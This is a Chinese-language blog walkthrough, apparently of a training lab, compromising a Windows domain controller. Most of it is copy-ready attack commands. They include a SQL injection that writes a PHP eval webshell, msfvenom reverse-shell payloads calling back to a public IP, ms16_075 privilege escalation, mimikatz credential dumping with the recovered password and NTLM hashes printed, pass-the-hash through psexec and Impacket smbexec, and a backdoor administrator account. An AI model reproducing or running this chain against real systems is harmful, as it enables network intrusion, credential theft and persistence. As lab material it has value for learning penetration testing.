內(nèi)網(wǎng)滲透拿域控

環(huán)境：http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看資料】

1、進去一看，典型的sql注入

2、測試了一下，可以爆庫，也可以寫一句話，并且還爆了絕對路徑，直接拿shell，進入主題

①將shell.php寫入網(wǎng)站根目錄，payload

http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>" into outfile 'C:/phpstudy/www/shell.php'

②蟻劍連接，發(fā)現(xiàn)權(quán)限很低

kali機的提權(quán)和后滲透方法

提權(quán)我們可以傳個木馬用msf試試，獲取按照系統(tǒng)補丁來搜payload提權(quán)等等，這里就用最快的方式，msf（注意：，下面講關(guān)于kali中msf怎么內(nèi)網(wǎng)穿透，方法太多了）

kali內(nèi)網(wǎng)穿透用花生殼

拿到webshell之后，由于這個webshell是在公網(wǎng)的，無法訪問我們內(nèi)網(wǎng)的kali，所以我們得將kali中的某個端口映射到公網(wǎng)

下載花生殼

1、可以看到kali的內(nèi)網(wǎng)ip為192.168.0.108

2、接著設(shè)置一下花生殼的配置
3、可以看到我們映射到公網(wǎng)的ip和端口

4、接著使用msf制作訪問我們公網(wǎng)ip和端口的后門

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

5、打開msf的監(jiān)聽

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp 或者使用 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.108 set lport 6666 run

6、執(zhí)行webshell中的木馬

sessions 1 //進入會話

7、發(fā)現(xiàn)無法不是最高權(quán)限，getsystem/getprivs并未成功

8、一般使用最多的是ms16_075的方式提權(quán)了，這個成功率高，試試

但是由于我們是內(nèi)網(wǎng)，所以就必須準備兩個msf窗口才能使用msf的提取功能

①msf窗口1執(zhí)行監(jiān)聽命令

②msf窗口2權(quán)限低的那個會話執(zhí)行提權(quán)命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

③接著監(jiān)聽的那個msf窗口1就獲得了一個system權(quán)限的會話

看路由器命令

route

一般為了防止后門被人關(guān)掉，將其注入到其他程序中

ps 查看進程pid

接著用migrate將我們后門注入到1816中，有效防止木馬掛了

migrate 1816

通過shell命令進入命令窗口

內(nèi)網(wǎng)信息收集

可以通過ifconfig看到內(nèi)網(wǎng)ip

接著利用后滲透工具ping方法掃一下ip段，接著掃出三個ip存活

info post/multi/gather/ping_sweep //查看所需參數(shù) run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //掃網(wǎng)段

還有一種方法，arp掃ip段，用法差不多，這個掃的快一些比較推薦

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

這是利用msf自帶工具掃描，接下來再演示使用nmap掃一下看看

首先添加一個路由如下命令

run get_local_subnets //查看網(wǎng)段 run autoroute -s 10.0.1.0/24 run autoroute -p //查看已添加的路由 background //保存session返回msf

接著開啟socks4a服務(wù)，使用msf的輔助模塊

use auxiliary/server/socks_proxy set VERSION 4a //設(shè)置為socks4a run

接著設(shè)置/etc/proxychains.conf 中的內(nèi)容改為下面展示截圖，kali自帶的代理工具

vim /etc/proxychains.conf

接著我們就可以利用proxychains4來進行連接3389端口，和進行內(nèi)網(wǎng)ip段掃描，使用nmap掃描其內(nèi)網(wǎng)ip及其端口等，但是掃的真的慢是我網(wǎng)太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

看到好多445端口，這里其實可以用永恒之藍的

當(dāng)然，也可以選擇不用nmap掃描端口，我們可以用msf的模塊掃描端口

use auxiliary/scanner/portscan/tcp set rhosts 10.0.1.6

kali機用kiwi抓取密碼

也可以直接抓取管理員密碼

msf提供一些后滲透的模塊

load -l 來查看有哪些模塊

其實kiwi就是mimikatz就是換了個名在這里，然后加載kiwi

查看當(dāng)前kiwi的命令用help

help

對10.0.1.4機子進行抓密碼，接著執(zhí)行下面命令，就可以獲取管理員密碼，這個是對登陸過的賬號和密碼進行抓取

kiwi_cmd privilege::debug kiwi_cmd sekurlsa::logonpasswords

獲得密碼 u：administrator p：woshifengge1.

kali機hash傳遞得到會話

看到445端口就可以嘗試hash傳遞，在不需要密碼的情況下使用，發(fā)現(xiàn)10.0.1.6-10.0.1.8可以被利用

hashdump可獲取hash值，得是64位系統(tǒng)權(quán)限才可執(zhí)行

hashdump 或者是 run post/windows/gather/hashdump 或者是 run post/windows/gather/smart_hashdump 以上都可以獲取hash值background 返回

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通過網(wǎng)段知道6-8有445可以利用smb的hash傳遞連接10.0.1.8這臺機子，因為一般情況幾臺機子的密碼都相同。

use exploit/windows/smb/psexec set payload windows/meterpreter/bind_tcp //正向連接 set SMBUser Administrator set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83 #hashdump獲取的hash值進行

這里發(fā)現(xiàn)10.0.1.8這臺機子存在域控，dns一般是和域控綁定在一個服務(wù)器上的

shell ipconfig /all

shell查看域的命令

shell中命令使用查看是否存在域的方法

這里明顯A1這臺機子處于域中

1、查看域中計算機

net view //查看域中的計算機

net view /domain //查看域

根據(jù)ipconfig /all 可以知道域控主機的ip是10.0.1.6

hash傳遞并不能登陸進去

2、查看域中的計算機

就一臺A1，這里我們得通過A1去獲得域控

net view /domain:ZKAQ

3、ping計算機名可以得到IP

ping A1

ping zkaq.cn

4、獲得所有域的用戶列表，有一個krbtgt就是域用戶

net user /domain

5、獲取域用戶組信息

net group /domain

6、獲取當(dāng)前域管理員信息

net group "domain admins" /domain

7、查看域時間及域服務(wù)器的名字

net time /domain

通過域的信息收集得到DC.zkaq.cn 10.0.1.6這個就是域控

拓展，導(dǎo)入kiwi的命令使用

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

2、kerberos抓密碼，發(fā)現(xiàn)全部加密了

kiwi_cmd sekurlsa::kerberos

3、也可以用creds_all抓取密碼，但也明顯加密

creds_all

Username Domain NTLM -------- ------ ---- A1$ ZKAQ 3bf63ae494aee3a74fa90a41b9459df9 Administrator ZKAQ 61465a991b168727b65b3644aab823cd Administrator A1 4d1de63584701c85b8b9eccf5243ef83

Impacket實現(xiàn)域控NTML的hash傳遞

這里發(fā)現(xiàn)密碼是無法獲取的，因為NTLM是密文，我們可以使用hash傳遞，不過這里得使用Impacket的包

首先我們要先去GitHub下載源碼，或者直接使用

git clone https://github.com/SecureAuthCorp/impacket.git

然后解壓縮，進入impacket

cd impacket/

然后運行

python setup.py install

工具都在這個目錄里impacket/examples

cd impacket/examples

接著我們使用smbexec.py這個模塊，用上面的ntml值hash傳遞登陸域控機子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超級管理員權(quán)限

接下來是基礎(chǔ)操作添加超管賬號，然后登陸域控

net user gylq ********** /add #密碼打長的，2008有限制，密碼不能太簡單 net localgroup administrators gylq /add #添加超管

直接代理登陸域控10.0.1.6就報錯，這是域控機的守護機制

需要使用他域內(nèi)的機子去登陸，我們先登陸10.0.1.8，再登陸域控

遠程3389登陸域控

也可以用直接用抓取的密碼來代理登陸3389的端口等，只是演示一下

如果對方?jīng)]有開啟遠程連接，可以使用msf自帶命令啟動

run getgui -e

先登陸10.0.1.4，才發(fā)現(xiàn)這個不是域內(nèi)機子，得去登陸10.0.1.8

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

也可以用代理直接連接10.0.1.8，來進行確定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

接著用10.0.1.8作為跳板登陸10.0.1.6，即域控機子

成功登陸域控

總結(jié)：這是kali中使用msf和impacket聯(lián)合拿域控

關(guān)注我，持續(xù)更新！

私我獲取【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】

總結(jié)

以上是生活随笔為你收集整理的【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。